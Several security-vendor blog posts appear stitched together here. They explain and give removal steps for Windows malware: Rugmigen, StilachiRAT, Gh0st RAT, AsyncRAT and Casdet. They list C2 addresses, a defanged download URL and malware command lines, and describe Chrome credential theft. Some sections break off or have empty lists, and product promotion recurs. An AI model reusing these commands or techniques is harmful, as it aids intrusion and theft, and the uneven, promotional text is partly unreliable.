What is Behavior:Win32/Rugmigen.B?

Behavior:Win32/Rugmigen.B is a detection name used by Windows Defender to flag suspicious activity. It commonly delivers infostealers, targeting sensitive data such as login credentials. It can lead to data theft, system compromise, and performance degradation through activities like cryptomining. In this post, we will take a detailed look at what this threat is as well as how to remove it.

Behavior:Win32/Rugmigen.B Overview

Behavior:Win32/Rugmigen.B is a detection name used by Windows Defender, particularly noted in recent user reports, where individuals experienced continuous “Threat Blocked” notifications. These notifications, occurring every 4-5 minutes, suggest active threat blocking by the antivirus, likely Windows Defender. The “Behavior” prefix indicates a behavioral detection, meaning the software identified suspicious activities rather than a specific file signature.

According to Microsoft’s security research, Windows Defender uses heuristic analysis to detect Rugmigen variants, monitoring for specific patterns of suspicious behavior rather than relying on traditional virus signatures. This approach is particularly effective against evolving threats that frequently change their code to evade detection, similar to how Trojan:Script/Phonzy.B!ml and other modern malware operate.

The Behavior:Win32/Rugmigen.B is a variant or detection name for the Rugmi malware family. Rugmi is classified as a Trojan downloader, a type of malware designed to fetch and install additional malicious software onto the infected system. This family has been extensively documented in cybersecurity reports, with significant activity noted in late 2023 and early 2024, and its detection rates have surged, reaching hundreds per day by recent accounts.

Technical Details

Rugmi, and by extension Behavior:Win32/Rugmigen.B, operates with a sophisticated structure comprising three distinct components. The Downloader is responsible for fetching an encrypted payload, often from remote servers, which enhances its ability to evade detection. The Internal Loader executes the payload using internal resources, allowing it to run without relying on external files initially. The External Loader runs the payload from an external file on the disk, providing flexibility in deployment.

These components enable Rugmi to act as a loader for various infostealers, including Lumma Stealer, Vidar, RecordBreaker (also known as Raccoon Stealer V2), and Rescoms. Infostealers are particularly dangerous as they can extract sensitive information such as login credentials, browsing history, and cryptocurrency wallet details.

Key Technical Characteristics

Based on Microsoft’s security analysis and user reports, Behavior:Win32/Rugmigen.B exhibits these technical characteristics:

• Process Injection Techniques: The malware injects malicious code into legitimate Windows processes to evade detection and gain system privileges.
• Anti-Analysis Capabilities: It employs techniques to detect and evade analysis environments, including virtual machines and debugging tools.
• Encrypted Communication: Communication with command and control servers is encrypted to avoid network-based detection.
• File System Manipulation: Creates, modifies, or deletes files in system directories without proper authorization.
• Registry Modifications: Makes unauthorized changes to the Windows registry, particularly to autorun keys that ensure persistence after system reboots.

The behavior detected under Win32/Rugmigen.B includes unauthorized system alterations, such as the appearance of unfamiliar files, changes in system settings, and attempts to disable security software. User reports indicate persistent issues even after system restores, similar to problems seen with DWM.exe issues and other system process manipulations.

Common File Locations

Behavior:Win32/Rugmigen.B typically creates or modifies files in these locations:

• %TEMP% directory with random filenames
• %APPDATA%\Microsoft\Windows\ with legitimate-looking names
• %LOCALAPPDATA%\Temp\ with executable files disguised as system components
• C:\ProgramData\ with hidden directories containing payload files

Registry Modifications

The malware typically modifies these registry keys to maintain persistence:

• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

Distribution and Prevalence

The distribution methods for Rugmi, and thus Behavior:Win32/Rugmigen.B, are diverse. Common vectors include malvertising, where malicious advertisements trick users into downloading infected files, and fake browser updates that pose as legitimate updates to exploit user trust. It also spreads through compromised software, infecting installations of popular programs like VLC media player or OpenAI ChatGPT. Additionally, it leverages Discord’s content delivery network to host and disseminate malware, taking advantage of the platform’s widespread use, similar to techniques used by Advanced Window Manager and other adware threats.

Recent telemetry data, as reported in cybersecurity analyses, shows a significant increase in detections, with spikes noted in October and November 2023, escalating to hundreds per day. This surge indicates active campaigns by threat actors, often operating under a Malware-as-a-Service (MaaS) model, where Rugmi is sold on subscription bases to other malicious actors, with prices ranging from $250 monthly for basic access to $20,000 for source code rights.

Impact and Risks

The impact of Behavior:Win32/Rugmigen.B and related Rugmi variants is substantial, affecting both individual users and potentially organizational systems. Key risks include data theft, as infostealers deployed by Rugmi can extract usernames, passwords, and financial information, leading to identity theft or financial loss.

The malware also compromises systems by providing remote access to attackers, enabling further exploitation or ransomware deployment. Additionally, its malicious activities, such as cryptocurrency mining, can degrade system performance, as noted in some removal guides. For example, recent forum posts, dated March 19, 2025, highlight user experiences with Behavior:Win32/Rugmigen.B. Users reported continuous notifications, with attempts at system restores failing to resolve the issue.

How to Remove Behavior:Win32/Rugmigen.B

Automatic Removal with GridinSoft Anti-Malware

For the most effective and straightforward removal process, we recommend using specialized anti-malware software. GridinSoft Anti-Malware is specifically designed to detect and remove modern threats like those that trigger the Behavior:Win32/Rugmigen.B detection.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Manual Removal Steps

If you prefer to remove the threat manually, follow these steps carefully. Note that manual removal can be complex and may not remove all components of the threat:

1. Boot into Safe Mode: Restart your computer and press F8 during startup to enter Safe Mode with Networking.
2. End malicious processes: Open Task Manager (Ctrl+Shift+Esc), go to the Processes tab, and look for suspicious processes. Right-click on any suspicious process and select “End Task.”
3. Remove startup entries:
   • Press Win+R, type “msconfig” and press Enter.
   • Go to the “Startup” tab and disable any suspicious entries.
   • Alternatively, open Task Manager, go to the Startup tab, and disable suspicious items.
4. Delete suspicious files:
   • Check these common locations for malicious files:
     • %TEMP% folder (Win+R, type %TEMP% and press Enter)
     • %APPDATA% folder (Win+R, type %APPDATA% and press Enter)
     • %LOCALAPPDATA% folder (Win+R, type %LOCALAPPDATA% and press Enter)
   • Look for recently added files with random names or suspicious extensions.
5. Clean the Registry:
   • Press Win+R, type “regedit” and press Enter.
   • Navigate to and check these locations for suspicious entries:
     • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
     • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
     • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
     • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
   • If you find suspicious entries, right-click and delete them.
6. Reset your browsers:
   • For Google Chrome: Settings → Advanced → Reset and clean up → Restore settings to their original defaults.
   • For Mozilla Firefox: Help (?) → Troubleshooting Information → Refresh Firefox.
   • For Microsoft Edge: Settings → Reset settings → Restore settings to their default values.
7. Update and run your antivirus program: Update your installed security software and perform a full system scan.
8. Restart your computer in normal mode after completing all steps.

How To Stay Safe?

To address Behavior:Win32/Rugmigen.B and prevent future infections, users are advised to take these steps:

1. Use reputable antivirus software: Keep security software like GridinSoft Anti-Malware updated with the latest definitions and run regular scans.
2. Avoid suspicious downloads: Do not download software from untrusted sources, especially torrents and free software bundlers.
3. Be cautious with email attachments: Never open attachments from unknown senders or unexpected emails.
4. Keep your system updated: Regularly update Windows and all installed software to patch security vulnerabilities.
5. Enable Windows Defender: Ensure Windows Security features are enabled, including real-time protection and cloud-delivered protection.
6. Be wary of browser notifications: Do not accept browser notifications from unknown or suspicious websites.
7. Use an ad blocker: Install a reputable ad blocker to prevent malicious ads that can lead to infection.
8. Implement proper backup strategies: Regularly back up important data to an external device or cloud storage service.

Frequently Asked Questions About Behavior:Win32/Rugmigen.B

Conclusion

Behavior:Win32/Rugmigen.B represents a serious security threat that primarily functions as a downloader for various infostealers. When this detection appears in Windows Defender, it indicates that suspicious behavioral patterns associated with the Rugmi malware family have been identified on your system.

The most effective approach is to use specialized anti-malware software like GridinSoft Anti-Malware to thoroughly scan and clean your system. This ensures all components of the threat are removed, preventing reinfection and protecting your sensitive information.

By following the prevention tips outlined in this guide and maintaining good security practices, you can significantly reduce the risk of future infections and keep your digital life secure.

The post Behavior:Win32/Rugmigen.B appeared first on Gridinsoft Blog.

The name “Stilachi” comes from Italian for “spike,” combined with RAT (Remote Access Trojan) – reflecting its sharp, piercing ability to penetrate security defenses. As Bitdefender reported on March 18, 2025, what makes this threat particularly concerning is its “impressive arsenal of malicious capabilities” and its laser-focused targeting of cryptocurrency wallets.

How StilachiRAT Works: Technical Analysis

According to Microsoft’s Security Blog, StilachiRAT isn’t just another generic malware variant. It was built specifically to hunt down cryptocurrency wallets. Microsoft Security Intelligence’s investigation revealed a consistent pattern across infected systems – cryptoassets vanish without a trace, often before victims realize they’ve been compromised.

Security researchers who investigated the malware described it as “the malware equivalent of trying to remove superglue with your bare hands,” highlighting both its effectiveness and the difficulty in eliminating it once it has infected a system.

Target List: Wallets in StilachiRAT’s Crosshairs

According to Quorum Cyber’s threat intelligence report, StilachiRAT doesn’t discriminate between blockchain ecosystems. It specifically targets 20 different cryptocurrency wallet extensions used in the Google Chrome browser, including:

While documented cases of theft attributed specifically to StilachiRAT remain limited due to its recent emergence, the potential impact on cryptocurrency holders is significant. As Microsoft noted, the malware can capture wallet addresses, private keys, and other sensitive information that allows attackers to access and steal digital assets stored in these wallets.

Anatomy of the Threat: How StilachiRAT Operates

Initial Reconnaissance

When StilachiRAT first infiltrates a system, it immediately begins mapping the digital environment. According to Microsoft’s analysis, it performs comprehensive system reconnaissance that includes:

Inventorying all hardware IDs and BIOS serial numbers, checking for webcams and microphones (potentially for future spying), mapping installed applications with special focus on financial software, and creating a unique tracking ID to mark the system in attacker databases.

This intelligence-gathering creates a complete profile of the target system, helping attackers identify high-value targets worth focusing on. As Quorum Cyber notes, the malware appears to prioritize systems based on potential cryptocurrency value.

Credential Theft Mechanism

Microsoft’s security team discovered that StilachiRAT uses an ingenious technique to breach Google Chrome’s security:

The malware locates Chrome’s master “encryption_key” file in the user directory, decrypts this key using built-in Windows functions, uses the master key to unlock the saved passwords vault, and extracts every stored credential in seconds.

The speed and efficiency of this attack means that by the time users realize what’s happening, their cryptocurrency accounts may have already been compromised.

Cryptocurrency Extraction Engine

According to Bitdefender’s analysis, the core malicious functionality in StilachiRAT is contained in a component called WWStartupCtrl64.dll. This module is specifically engineered for cryptocurrency theft:

It systematically scans the registry for installed wallet extensions, extracts wallet configuration files containing encryption keys, searches for backup seed phrases stored in text files or screenshots, and transmits private keys to attackers in real-time.

Unlike basic malware that causes system slowdowns, StilachiRAT operates with remarkable stealth. Microsoft noted that victims often only discover the theft days later when checking their wallet balances.

Self-Healing Persistence Mechanism

What makes StilachiRAT particularly difficult to remove is its intricate self-healing capability. As detailed in Bitdefender’s report:

“The malware can be launched either as a standalone component or a Windows service. Regardless of its form, the malware uses a watchdog thread that regularly checks if the RAT’s executable or dynamic link library (DLL) files are present on the system. If the components are not found, the malware recreates them using an internal copy generated during the initialization phase.”

Microsoft security engineers noted that the malware can maintain backup copies in unexpected locations, reinstall itself within seconds of removal attempts, and create multiple registry startup entries as fallbacks.

Identity Impersonation

StilachiRAT goes beyond data theft by enabling attackers to impersonate legitimate users. According to Quorum Cyber’s analysis, the malware:

Identifies active Remote Desktop Protocol (RDP) sessions, clones security tokens and privileges, launches applications using the compromised identity, and can move through corporate networks as an authorized user – bypassing standard security checks by using legitimate credentials.

This capability makes it particularly dangerous in enterprise environments where it can exploit trusted connections to access sensitive systems and cryptocurrency exchange accounts.

Clipboard Monitoring

Microsoft’s analysis confirmed that StilachiRAT constantly monitors clipboard contents for valuable data:

It captures clipboard contents at high frequency, uses pattern matching to identify wallet addresses, passwords and private keys, can trigger immediate theft operations when it detects valuable data, and operates with minimal performance impact to avoid detection.

This clipboard monitoring capability is particularly effective against cryptocurrency users who frequently copy and paste wallet addresses or seed phrases, unaware that the malware is intercepting this sensitive information.

Advanced Evasion Techniques

StilachiRAT employs various methods to avoid detection, as detailed by multiple security firms:

It regularly erases Windows Event Logs to cover its tracks (particularly logs with Event IDs 1102 and 104), detects virtual machines and sandbox environments used by security researchers, changes its code signature to evade antivirus detection, and uses encrypted communication that mimics normal HTTPS traffic.

Command and Control Infrastructure

According to Quorum Cyber, the malware maintains contact with its operators through a well-designed two-channel system:

“The malware communicates with a command-and-control (C2) server using domain names that are intentionally scrambled or disguised, and instead of using standard IP address formats, the malware encodes IP addresses in a binary format.”

It utilizes common ports (53, 443, 16000) to blend with normal traffic and accepts remote commands that can control virtually every aspect of the infected system. This connection allows attackers to manually take control when high-value targets are identified.

Distribution Methods

While Microsoft has not definitively determined how StilachiRAT is initially delivered, security researchers have identified several potential infection vectors:

Fake wallet extensions: Counterfeit versions of legitimate cryptocurrency wallet extensions that look identical to the real ones.

Phishing campaigns: Emails and messages claiming to be from cryptocurrency exchanges offering “security updates” or “verification requirements.”

Compromised downloads: Modified installers for legitimate software that secretly bundle the malware.

Cracked software: Pirated applications and activation tools containing trojan payloads.

According to Ken Colburn’s analysis in AZ Central, “It doesn’t matter what browser you’re using if you open the wrong file or click the wrong link” – highlighting that StilachiRAT’s delivery methods target user behavior rather than specific technical vulnerabilities.

Effective Protection Against StilachiRAT

Standard antivirus protection may not be sufficient against this evolving threat. Security experts recommend a multi-layered approach:

1. Verify wallet extensions thoroughly: Only install from official web stores after carefully verifying the developer, review count, and installation numbers.
2. Use hardware wallets: Keep significant cryptocurrency holdings in cold storage devices like Ledger or Trezor that never connect directly to the internet.
3. Implement browser security features: As Ken Colburn notes in AZ Central, “Edge combined with Windows Defender SmartScreen can reduce your exposure to malicious websites and risky downloads,” though third-party security solutions offer more comprehensive protection regardless of browser choice.
4. Enable application control: Use Windows features to restrict execution to known, trusted software.
5. Monitor event logs: Be vigilant for cleared logs, especially Event IDs 1102 and 104, which may indicate anti-forensic activity.
6. Deploy specialized security software: According to Bitdefender, “Dedicated software like Bitdefender Ultimate Security can keep your devices clean of RATs, viruses, worms, zero-day exploits, ransomware, spyware, rootkits and other digital threats.”
7. Isolate cryptocurrency activities: Consider using a dedicated device exclusively for cryptocurrency transactions, separated from everyday browsing.
8. Perform regular security audits: Scheduled checks for unusual services and registry entries can help detect compromise early.

StilachiRAT Removal Procedure

If you suspect infection, immediate action is critical:

Advanced User Removal Process

Be aware that StilachiRAT actively resists removal attempts. According to Microsoft’s analysis, the malware’s self-healing capabilities make manual removal exceptionally challenging. If you have the technical expertise:

1. Disconnect from the internet immediately
2. Boot into Safe Mode with Networking (press F8 during startup)
3. Open Task Manager (Ctrl+Shift+Esc) and terminate suspicious processes
4. Check Services console for unfamiliar services, especially those with randomized names
5. Remove suspicious browser extensions from Chrome
6. Use Registry Editor to search for and remove startup entries
7. Run multiple security tools to verify complete removal

Important warning: StilachiRAT’s self-repair mechanisms make manual removal extremely difficult. Missing even a single component can result in complete reinfection within minutes.

Recommended Solution: Specialized Removal

For most users, dedicated anti-malware software is the most effective option. GridinSoft Anti-Malware provides a specific removal protocol for StilachiRAT that targets all components simultaneously. This approach:

• Neutralizes the malware’s self-repair mechanism before beginning removal
• Identifies and eliminates all components in a coordinated operation
• Thoroughly cleans infected browser profiles and extensions
• Restores security settings modified by the malware

Click the banner below to download GridinSoft Anti-Malware and follow the installation prompts to clean your system from StilachiRAT.

Recovery Prospects After Cryptocurrency Theft

The reality of cryptocurrency theft presents significant challenges for recovery:

Unlike traditional financial fraud where banks can reverse transactions, blockchain transactions are fundamentally irreversible by design. When private keys are compromised, attackers can authorize transfers that cannot be undone by any central authority.

However, there are limited scenarios where recovery might be possible:

1. Exchange intervention: If stolen funds were transferred to a regulated cryptocurrency exchange, immediate reporting with transaction IDs and wallet addresses may allow the exchange’s security team to freeze assets.
2. Law enforcement: The FBI’s Cyber Division and similar agencies have developed capabilities for tracking cryptocurrency crime, with several successful recovery cases documented.
3. Blockchain analytics: Companies specializing in cryptocurrency tracing may help identify exchange deposit points where funds could potentially be recovered.

For any chance of recovery, document these details immediately:

• The exact time theft was discovered
• Transaction IDs of unauthorized transfers
• Destination wallet addresses
• Any evidence regarding how the system was compromised

Timing is critical – successful recovery cases typically involve reporting within hours of the theft, before funds can be laundered through multiple wallets.

The Emerging Threat Landscape

StilachiRAT represents an evolution in cryptocurrency-targeting malware. As noted by Bitdefender, while it has only been “spotted in the wild a few times” as of March 2025, its advanced capabilities make it a significant concern for cryptocurrency holders.

According to Microsoft’s security team, “What makes this threat different is its focus. It’s not trying to infect millions of computers—it’s hunting specifically for crypto holders and executing perfect heists. One successful infection can yield more profit than thousands of traditional ransomware victims.”

For cryptocurrency users, the implications are clear: securing digital assets requires specialized security measures beyond standard practices. As Ken Colburn noted in AZ Central, “This malware warning is a serious reminder of the threats we all face, but it’s not a browser-specific flaw — it’s a wake-up call for users who aren’t taking security seriously.”

Protection begins with awareness and requires ongoing vigilance. The most effective defense combines secure hardware wallets, isolated computing environments, and specialized security tools designed to counter the specific techniques used by cryptocurrency-targeting malware like StilachiRAT.

Stay informed and protected – the security of your cryptocurrency depends on it.

References

• Microsoft Incident Response. (2025, March 17). StilachiRAT analysis: From system reconnaissance to cryptocurrency theft. Microsoft Security Blog.
• SC World. (2025, March 18). Novel sophisticated StilachiRAT malware emerges. SC World.
• Colburn, K. (2025, March 23). Does switching from Google Chrome to Edge defend against the StilachiRAT malware? AZ Central.
• Quorum Cyber. (2025, March 20). StilachiRAT: A New Remote Access Trojan Posing a Significant Threat. Quorum Cyber Threat Intelligence.
• Constantinescu, V. (2025, March 18). Researchers Discover New ‘StilachiRat’ Malware. Bitdefender Hot for Security Blog.

The post StilachiRAT: The Emerging Crypto-Stealing Malware Threat appeared first on Gridinsoft Blog.

Gh0st RAT Trojan Targets Chinese Windows Users

In early June, cybersecurity researchers discovered a malicious campaign targeting users from China. Threat actors are spreading Gh0st RAT using the malware dropper Gh0stGambit, which finds its way to user devices through a phishing site chrome-web[.]com. The attackers employed a drive-by download. They offered users a Google Chrome installer file on a page that appeared to be a legitimate Chrome downloading site. However, the MSI installer downloaded from the fake site contains two files: the legitimate Chrome installation executable and the malicious installer WindowsProgram.msi, which is used to execute shell code responsible for downloading Gh0stGambit.

Gh0st RAT is a long-standing piece of malware from the arsenal of APT27, with its source code made publicly available in 2008. According to sources, its command infrastructure was primarily based in the People’s Republic of China. Written in C++, it has appeared in various forms over the years, primarily in campaigns organized by China-linked cyber espionage groups. Researchers report that a modified variant of Gh0st RAT was used in campaigns by the hacker group in 2018.

Some Details

The exact attack happens in a multi-staged manner. Before carrying out its primary task, Gh0stGambit checks the system for anti-malware software, such as Microsoft Defender or 360 SafeGuard. If it detects these programs, it adds its folder to their exclusions. Then it connects to a command and control server at hxxp://pplilv.bond/d4/107.148.73[.]225/reg32 and initiates the download of Gh0st RAT.

Gh0st RAT is delivered in encrypted form disguised as a Registry Workshop. In addition to providing remote access, it can collect information (keylogging, screen capturing, etc.). Moreover, it contains an embedded rootkit that allows it to hide certain system elements, such as the registry or directories.

It can also can drop Mimikatz in the system folder, enable RDP on compromised hosts, gain access to account identifiers associated with Tencent QQ, clear Windows event logs, and erase data from 360 Secure Browser, QQ Browser, and Sogou Explorer.

It is rather unusual to see malware with allegedly Chinese origin to attack users from mainland China. Typically threat actors keep away from attacking anything or anyone within their country, as it makes the distance to law enforcement too short. Thing is – it is not just regular malware, but a toolkit for spying on citizens. And earlier, APT27 was seen doing exactly this to Chinese citizens, both on the mainland and on Taiwan.

How to protect your system?

Such staged, multi-component attacks require advanced security software to protect against. Aside from excellent real-time and database-backed protection, it should also feature a network protection system that may filter out phishing sites like the one used in this campaign. All this is available in GridinSoft Anti-Malware – check it out through the banner below.

The post Gh0st RAT Malware Attacks Chinese Users Via Fake Chrome Page appeared first on Gridinsoft Blog.

AsyncRAT Spreads in Fake eBook Files

The latest spreading campaign of AsyncRAT was described by Gridinsoft analysts. Fraudulent actors publish what originally looks like a downloading link for an archive that contains the desired book. As I’ve mentioned, the specific book that this website offers is not free, so it adds even more to the temptation of a user. After hitting the download button, they see a genuinely looking file, and click it, hoping to open the book.

But despite the expectation, nothing will ever happen. This file is only made to look like one of an ebook, and is in fact a disguised compressed file that triggers the chain of malicious events. Shall the user click on it, the file executes its script, launching a multi-stage malware loader. All the resources needed for the attack (except the final payload) are stored in this exact fake ebook file.

The first thing that is launched is a PowerShell script that initially checks the system for antivirus software. Then, it starts playing with the files in the archive, which only look as video files. In fact, they only have extensions of ones, being a VBS script under the bonnet. This first batch file collects system information and runs another VBS file that eventually downloads AsyncRAT from the command server. The other script creates another task in the Scheduler, and executes the final payload.

What is AsyncRAT?

AsyncRAT is an open-source remote access tool, that originally appeared on public in 2019. For obvious reasons, it is often weaponized by malicious actors. Even in its original design, it is a powerful toolkit for remote access and administration, with the application of encrypted connections during the session. AsyncRAT is capable of logging keystrokes, sending remote commands, controlling the attacked system and deploying malware.

As the source code is freely available, it is nearly impossible to trace a specific cybercrime gang that uses it in their attacks. In fact, AsyncRAT appears in both attacks on individuals and high-profile cyberattacks led by state sponsored actors. Open-source nature also adds to the flexibility of the payload. Functionality, detection evasion, capabilities for other malware delivery – they can alter pretty much anything. This is what makes not only AsyncRAT, but any open-source malware exceptionally dangerous.

How to protect against malware?

To stop the obfuscated malware spreading campaign like the one I’ve described above, I recommend using GridinSoft Anti-Malware. Its multi-component detection system will stop the attack even before the malicious file gets to the system, thanks to its superior online protection module.

The post AsyncRAT Spreads As Fake eBook Files, Uses LNK Files appeared first on Gridinsoft Blog.

This comprehensive guide shows you exactly how to remove this sophisticated threat. We’ll cover both manual removal techniques and automatic solutions. Let’s start with what you need to know about this dangerous malware.

What is Trojan:Win32/Casdet!rfn?

Casdet is a sophisticated remote access trojan that works primarily as a malware downloader. It creates a backdoor into your computer and delivers additional malicious payloads. The malware can steal your personal information and give cybercriminals remote control over your system.

Sometimes Casdet shows up as a false positive detection. This happens when you download legitimate software like Android emulators or game mods. But most of the time, it’s a real threat that needs immediate removal.

The trojan is part of a broader category of trojan malware that can cause serious damage. What makes Casdet particularly dangerous is its modular structure, which allows it to adapt and perform different malicious functions.

How Casdet Operates

Understanding how Casdet works helps you remove it more effectively. This malware follows a specific pattern of infection and operation.

Initial Infection and Evasion

Casdet typically arrives through phishing emails or bundled with cracked software. Once it gets on your system, it immediately starts evasion techniques:

• Detection Evasion: Uses obfuscation techniques to hide from antivirus
• Environment Checks: Scans for virtual machines and debuggers
• Geofencing: Checks system language to avoid certain countries
• Idle Time: Waits several minutes before executing to avoid detection

The malware specifically checks these registry keys to determine your system’s language and location:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
• HKCU\Software\Classes\Local Settings\MuiCache\130\52C64B7E\LanguageList

System Fingerprinting and Persistence

After initial checks, Casdet collects information about your system. This creates a unique fingerprint that gets sent to the command servers:

• Operating system version and architecture
• Username and computer name
• CPU and GPU specifications
• Display resolution and device vendor
• IP address and network information
• List of installed software

For persistence, Casdet abuses the Windows Error Reporting service by executing this command:

C:\Windows\system32\WerFault.exe -u -p 3560 -s 216

This technique allows the malware to maintain access even after system reboots, similar to methods used by other advanced trojans.

Command and Control Communication

Casdet communicates with multiple command and control (C2) servers. The malware contains these hardcoded IP addresses:

• 20.99.133.109:443
• 20.99.186.246:443
• 20.99.185.48:443
• 23.216.147.64:443
• 23.216.147.76:443
• 104.80.88.11:443
• 192.229.211.108:80
• 20.99.184.37:443

The malware encrypts its communications and can receive various commands from these servers, including instructions to download and execute additional malware.

Payload Delivery Mechanism

This is where Casdet becomes extremely dangerous. It can deploy virtually any type of malware:

• Ransomware that encrypts your files
• Information stealers that harvest passwords and personal data
• Cryptocurrency miners that slow down your system
• Additional backdoors for persistent access

Casdet executes payloads using this technique:

"C:\Windows\System32\rundll32.exe" C:\Users\[Username]\AppData\Local\Temp\[random_name].dll,DllMain

This method makes detection harder because it uses legitimate Windows processes to run malicious code.

Signs Your Computer is Infected

You might notice these symptoms if Casdet is on your computer:

• Computer runs slower than usual
• High CPU usage from unknown processes
• Strange files in temporary folders
• Antivirus detection alerts
• Network activity when you’re not using the internet
• System freezes or crashes
• Browser redirects to suspicious websites

These symptoms are similar to other information stealing malware we’ve analyzed before.

Manual Removal Steps

You can remove Casdet manually by following these steps. This process takes time but it’s effective. Make sure to follow each step carefully.

Step 1: Preparation

First, you need to prepare your system for the removal process. This helps prevent the malware from interfering with your cleanup efforts.

1. Disconnect your computer from the internet
2. Boot your computer in Safe Mode
3. Create a backup of important files (scan them first)
4. Close all running programs

Safe Mode prevents most malware from running. This makes removal easier and safer.

Step 2: Identify Malicious Processes

Next, you need to find the malicious processes running on your system. Casdet often disguises itself as legitimate Windows processes.

1. Press Ctrl + Shift + Esc to open Task Manager
2. Click on the “Processes” tab
3. Look for suspicious processes with high CPU usage
4. Check for processes named “WerFault.exe” running from unusual locations
5. Right-click suspicious processes and select “End Task”

Be careful not to end legitimate Windows processes. When in doubt, research the process name online first.

Step 3: Delete Malicious Files

Now you need to find and delete the malware files. Casdet typically hides in these locations:

1. Navigate to C:\Users\[Username]\AppData\Local\Temp\
2. Look for DLL files with random names (like “e8442b7f12ab7cb616c549181d39c10b.dll”)
3. Delete any suspicious files you find
4. Check C:\Windows\System32\ for modified WerFault.exe
5. Empty your Recycle Bin completely

Similar to other trojan variants, Casdet uses temporary folders to hide its files.

Step 4: Clean Startup Programs

Remove the malware from your startup programs to prevent it from running when Windows starts:

1. Press Win + R to open the Run dialog
2. Type “msconfig” and press Enter
3. Click on the “Startup” tab
4. Look for suspicious entries
5. Uncheck any suspicious startup items
6. Click “Apply” and “OK”

You can also check the startup folder at C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.

Step 5: Registry Cleanup

Clean the Windows Registry to remove malware entries. This is a critical step that many users skip.

1. Press Win + R and type “regedit”
2. Navigate to these registry keys:
3. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache
4. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
5. HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\130\52C64B7E\LanguageList
6. Delete any suspicious entries you find

Warning: Be extremely careful when editing the registry. Wrong changes can damage your system.

Step 6: Check Scheduled Tasks

Casdet might create scheduled tasks to maintain persistence. Remove these tasks:

1. Press Win + R and type “taskschd.msc”
2. Look through the task list for suspicious entries
3. Right-click suspicious tasks and select “Delete”
4. Pay attention to tasks that run random executable files

This method is also effective against similar trojan families that use persistence techniques.

Browser Cleanup

If Casdet affected your browser, you need to clean it completely. The malware might have installed malicious extensions or changed your browser settings.

Remove Malicious Browser Extensions

Reset Your Browser

If you suspect browser-based malware components, reset your browser completely:

Automatic Removal with GridinSoft Anti-Malware

Manual removal can be complex and time-consuming. For a faster, more reliable solution, GridinSoft Anti-Malware offers automatic detection and removal of Casdet trojans. Professional anti-malware software can find hidden components and registry changes that you might miss.

GridinSoft Anti-Malware is specifically designed to handle advanced threats like Casdet. It can detect the malware even when it’s using obfuscation techniques to hide from basic antivirus programs.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

How to Prevent Future Infections

Preventing Casdet infections is easier than removing them. Follow these simple steps to protect your computer:

Avoid Suspicious Downloads

Casdet often comes with cracked software and pirated games. Stick to official software sources. Cracked games pose serious security risks that aren’t worth taking.

Be Careful with Email Attachments

Don’t open attachments from unknown senders. Even if you know the sender, verify suspicious attachments before opening them. Professional hacker email scams are becoming more sophisticated.

Keep Your System Updated

Install Windows updates regularly. Updates often include security patches that protect against malware. Enable automatic updates if possible.

Use Reliable Antivirus Software

Keep your antivirus software active and updated. Real-time protection can stop malware before it infects your system.

Enable Windows Defender

Don’t disable Windows Defender unless you have a good reason. It provides basic protection against common threats.

Frequently Asked Questions

What is Trojan:Win32/Casdet!rfn and why is it dangerous?

Casdet is a remote access trojan that gives cybercriminals control over your computer. It can steal your personal information, download additional malware, and slow down your system. The trojan is particularly dangerous because it can install other threats like cryptocurrency miners or ransomware.

How did Casdet get on my computer?

Most people get infected through phishing emails or by downloading cracked software. The malware might also come from suspicious websites or infected USB drives. Sometimes it spreads through fake system compromise emails that trick users into downloading malicious attachments.

Can I remove Casdet manually?

Yes, you can remove Casdet manually by following the steps in this guide. However, manual removal requires technical knowledge and can be time-consuming. If you’re not comfortable with these steps, use automatic removal tools instead.

Is it safe to delete WerFault.exe?

The legitimate WerFault.exe is a Windows system file that handles error reporting. However, Casdet abuses this process for malicious purposes. Only delete WerFault.exe if it’s running from unusual locations or behaving suspiciously.

How can I prevent Casdet infections?

Avoid downloading cracked software, be careful with email attachments, keep your system updated, and use reliable antivirus software. These basic security practices will protect you from most malware threats.

What if manual removal doesn’t work?

If manual removal fails, use professional anti-malware software like GridinSoft Anti-Malware. Some malware variants are too sophisticated for manual removal. Professional tools can detect and remove hidden components that manual methods might miss.

Can Casdet steal my passwords?

Yes, Casdet can be modified to steal passwords and other sensitive information. It’s part of a broader category of information stealers that target personal data. Change your passwords after removing the malware.

Will Casdet slow down my computer?

Yes, Casdet typically slows down infected computers by using system resources for malicious activities. It might also download additional malware that further degrades performance. Similar to other system processes that get compromised, infected systems often show high CPU usage.

Conclusion

Removing Trojan:Win32/Casdet!rfn requires careful attention to detail. The malware is sophisticated and can hide in multiple system locations. Manual removal works but takes time and technical knowledge.

